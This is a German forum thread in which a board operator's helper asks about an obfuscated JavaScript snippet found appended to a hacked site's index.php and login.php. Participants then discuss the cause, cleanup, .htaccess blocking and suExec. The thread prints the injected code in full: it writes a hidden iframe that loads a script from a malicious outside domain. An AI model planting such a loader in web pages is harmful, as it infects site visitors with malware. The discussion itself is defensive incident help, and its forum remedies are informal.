Gehackter FTP Zugang

[+Jürgen+]

Wer kann mir erklären, was der folgende Code anstellt?

Code:

<!-- o --><script>var fvk="<";var wph="i";var jvnka=" ";var gomnh="nhbcn='nEK6DQJo' doial='dhCke37D' gdzzh='gQWd7VrL' gazuj='hJVRBJkH' hxzpl='81GXG6dn' lsoir='yU8BhjRB' ngggo='xYmvNtUu' lrfwl='txkXFkqC' kxnos='qC3DWG3h' src=";var jzuvy="ame>";var cilee="om/tds/go.php?sid=1&xu=j";var beabi="?fpqUf ";var qzx="f";var jjm="r";var cyt="a";var cwapy="cpydh='aiptWeJC' gvhgz='i6pumOkl' gwyzq='hAUfSYnT' gypth='hE8P7iqB' gagmz='eTR4OD2h' fgodg='chkkfjFC' dqntd='X6hLXacU' bbmjz='VL01o6o0' ahuag='QkydgyBI' ";var unz="m";var oxo="e";var zpzre="width=612 ";var glvei="http://bestgreenstreet.c";var vmpsa="height=328 ";var qjfsw="style='display:none'";var clcnd=glvei+cilee;var mgvts="></ifr";document.write(fvk+wph+qzx+jjm+cyt+unz+oxo+jvnka+gomnh+clcnd+beabi+cwapy+zpzre+vmpsa+qjfsw+mgvts+jzuvy);</script><!-- c -->

Heute hatte ich mit einer wbb Bordbetreiberin ein Gespräch, darin bat sie um Hilfe das offensichtlich ihr FTP-Zugang gehackt wurde und die Index.php mit obigen Text erweitert wurde.
Weiß hier jemand weiter? Passwörter usw. wurden inzwischen geändert.
Bordbesucher hatten immer wieder eine Viruswarnung beim Besuch der Seite bekommen.

Dieser Code wurde einfach hinter ?> angehängt.

Edit:
In der Login.php wurde der selbe Code angehängt.

[schlumpfi]

1) ein javascript virus/malware, der von einem anderen server eingebunden wird via iframe und daten ausspioniert. unten stehen die hosts, die dieses abrufen. diese mit htaccess blockieren lassen!!

2) der server ist sehr wahrscheinlich in vielen files kompromitiert (verseucht)... es sollte ein backup eingespielt werden, bevor dieser kompromitiert wurde...
falls dieses nicht gelingt, sollte der server neu aufgesetzt werden, da man nicht weis, wo dieser kompromitiert ist

3) ein ftp wurde nicht gehackt. vermutlich (meine meinung) über ein exploit diese codefragmente eingefügt...

4) alle logfiles des server kontrollieren. ggf findet man dort zugriffe und änderungslogs

wenn noch fragen sind, bitte posten.
detalierte auskunft über diese art des kompromitierten scriptes erteile ich nur via pn...

folgendes in der htaccess im root einbinden!!!
<filesmatch "(.*)">
Order Allow,Deny
Deny from bestgreenstreet.com
Deny from rezmas.com
Allow from all
</filesmatch>

ps:// hast ne pn...

mfg

edit// d.h. kompromitiert, nicht kompiliert 

[+Jürgen+]

Genial, das ist detailiert.
Hut ab.
Wie kann so etwas eigentlich passieren?
Ich kann doch eine php Datei nicht ohne FTP Zugang einfach ändern oder?

[schlumpfi]

Genial, das ist detailiert.
Hut ab.
Wie kann so etwas eigentlich passieren?
Ich kann doch eine php Datei nicht ohne FTP Zugang einfach ändern oder?

a)
via exploit für das wbb... gibt es on mass
zudem kommt noch, das auf der besagten seite unmengen an hacks + addons installiert sind, die wiederum einige sicherheitslücken beinhalten...

b) htaccess
ja die htaccess ins root legen... mit namenskennung ".htaccess"
über die verwendung einer htaccess sollte sich jeder serverbetreiber, egal ob root oder webspace, auseinander setzen.
dieses ist, neben der richtigen konfiguration vom server (webspaceanbieter - provider), der erste weg, um sicherheitsprobleme anzugehen...

mfg

[delta]

Ich kann doch eine php Datei nicht ohne FTP Zugang einfach ändern oder?

Selbstverständlich kannst man das - und das beschränkt sich nicht allein auf PHP Dateien.

über die verwendung einer htaccess sollte sich jeder serverbetreiber, egal ob root oder webspace, auseinander setzen.
dieses ist, neben der richtigen konfiguration vom server (webspaceanbieter - provider), der erste weg, um sicherheitsprobleme anzugehen...

Naja ...
als den Ersten Weg würde ich das nicht gerade bezeichnen - eher als Krücke.
Was soll es bringen, in der .htaccess die zwei im angreifenden Script erkannten Domains zu sperren?
Angreifer bedienen sich i.d.R. eines umfangreichen Netzes von Zombie-Rechnern; der nächste Angriff kommt also ganz bestimmt (und auch trotz des Eintrags dieser zwei Domains in die .htaccess).
Daneben bilden diese beiden Domains lediglich das Empfängerziel für die ausgespähten Daten (oder eher noch als Adresse für das Nachladen des tatsächlichen Exploids).
Der Verursacher des Angriffs ist also gänzlich unbekannt.

Das YaBB-Forum zum Beispiel, hat sich im Laufe der vergangenen drei Monate, zweimal einen Code (ähnlich dem w.o.) eingefangen - allerdings nicht über das Script des Forums sondern über die (in PHP geschriebene) Startseite.
Ich hatte den Betreiber der Domain seinerzeit darauf aufmerksam gemacht und er teilte mir mit, dass die Virenwarnung erst dann bei ihm angezeigt wurde, als er von seinem Firmenrechner (also von einer anderen IP aus) auf den Foren-Server zugegriffen hat.
Ganz schön clever gemacht - oder?

[+Jürgen+]

@schlumpfi

Wenn du dir besagtes Board der USERIN mal angeschaut hast, wirst du evtl. bemerkt haben, dass dort das Security System eingebaut wurde. Anscheinend keine Wirkung.
Wenn du auch ein wbbler bist, dann liste ich dir mal die zensierten Worte die man mit der Installation des System´s in das ACP eintragen muß.
Nur diese Zensur ist für ein Support-Board wie unseres doch Müll. Wir schreiben ja über und mit diesen Wörten.

[schlumpfi]

zum wbb deiner "kundin", sry wenn nicht so ist 

hat mit den "badwords" im acp eigentlich nichts zu tun...
bad words werden nur abgefangen, wenn user einen beitrag/thread/post sendet, der dieses "bad word" beinhaltet
und dann wird dieses ersetzt durch "ersatzwort"

exploits werden gezielt auf sicherheitslücken angesetzt, die man genau kennt.
wenn das ct sec sys 6 installed ist, gibts nur 2 möglichkeiten...

1) ct sec sys 6 ist nicht richtig installiert... betonung liegt auf richtig/korrekt
2) ct sec sys 6 ist die signatur des exploits noch nicht bekannt.

da dort sehr viele hacks installed sind, gehe ich davon aus, das durch einen hack/addon dieses fragment eingefügt wurde, das nicht durch ct sec sys geschützt wurde...

um genaueres zu sagen müsste ich admin im forum+ftp sein und einiges testen...

hoffe ich konnte helfen 
mfg

[delta]

suExec
sollte auf dem Server installiert und (richtig) eingerichtet sein - dann können keine Scripts verändert werden.
Hat sich das noch nicht unter den Providern herumgesprochen?

[+Jürgen+]

@schlumpfi
nein, das ist keine Kundin. Ich habe sie in einem Supportforum kennengelernt als sie danach fragte warum ihr Virenscanner anspringt wenn sie ihre eigene Seite im Internet besucht. Dabei sind wir auf die veränderten Dateien gestoßen.

Sie hat das CT Security System Pre installiert.

@delta

http://de.wikipedia.org/wiki/Mod_suexec  denke doch, dass dies inzwischen Standard sein sollte oder?

[delta]

@delta
http://de.wikipedia.org/wiki/Mod_suexec  denke doch, dass dies inzwischen Standard sein sollte oder?

Nun - wenn dem so wäre, dann hätte Deine Bekannte sicherlich kein Problem gehabt.
Siehe: http://httpd.apache.org/docs/1.3/suexec.html

[+Jürgen+]

Wenn das so ein supper Modul ist, macht es denn dann nicht auch CTXtra in Teilen überflüssig?
Wie ich auch gelesen habe, haben hierzu auch bekannte Hoster differenzierte Meinungen.

[delta]

Wenn das so ein supper Modul ist, macht es denn dann nicht auch CTXtra in Teilen überflüssig?
Wie ich auch gelesen habe, haben hierzu auch bekannte Hoster differenzierte Meinungen.

In Teilen - Ja!
Aber nicht alle Hoster haben suExec installiert.
Wie Du in der Doku (siehe obigen Link) nachlesen kannst, setzt die Konfiguration einiges an Fachwissen voraus.
Wo hast Du die differenzierten Meinungen aufgegriffen?

[+Jürgen+]

Wo hast Du die differenzierten Meinungen aufgegriffen?

Nicht aufgegriffen, gelesen. Auf der Suche mit Google "Konfiguration Appache"

[delta]

Wo hast Du die differenzierten Meinungen aufgegriffen?

Nicht aufgegriffen, gelesen. Auf der Suche mit Google "Konfiguration Appache"

Hier ...

http://de.wikipedia.org/wiki/Mod_suexec  denke doch, dass dies inzwischen Standard sein sollte oder?

warst Du allerdings der Meinung das suExec auf jedem Server installiert sein sollte.
Irgendwie weiß ich jetzt nicht so richtig was Du sagen willst.

[+Jürgen+]

Anfangs ja, ich hab mit Serverkofiguration nichts am Hut. Da mußte ich selbst erst nach Input suchen.
Und wenn ich mit XAMPP experimentiere, brauch ich das nicht.